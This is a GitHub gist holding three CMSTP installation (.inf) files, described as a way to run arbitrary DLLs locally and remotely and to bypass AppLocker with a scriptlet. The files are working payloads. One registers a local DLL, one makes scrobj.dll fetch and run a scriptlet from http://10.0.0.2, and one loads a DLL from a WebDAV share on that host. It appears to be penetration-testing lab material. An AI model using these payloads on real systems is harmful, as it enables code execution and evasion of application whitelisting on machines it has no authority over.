Skip to content

Instantly share code, notes, and snippets.

@netbiosX
Created May 7, 2018 07:45
Show Gist options
  • Save netbiosX/15c963465bf1e78969fb3347c43b45b9 to your computer and use it in GitHub Desktop.
Save netbiosX/15c963465bf1e78969fb3347c43b45b9 to your computer and use it in GitHub Desktop.
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/pentestlab.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
\\10.0.0.2\webdav\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment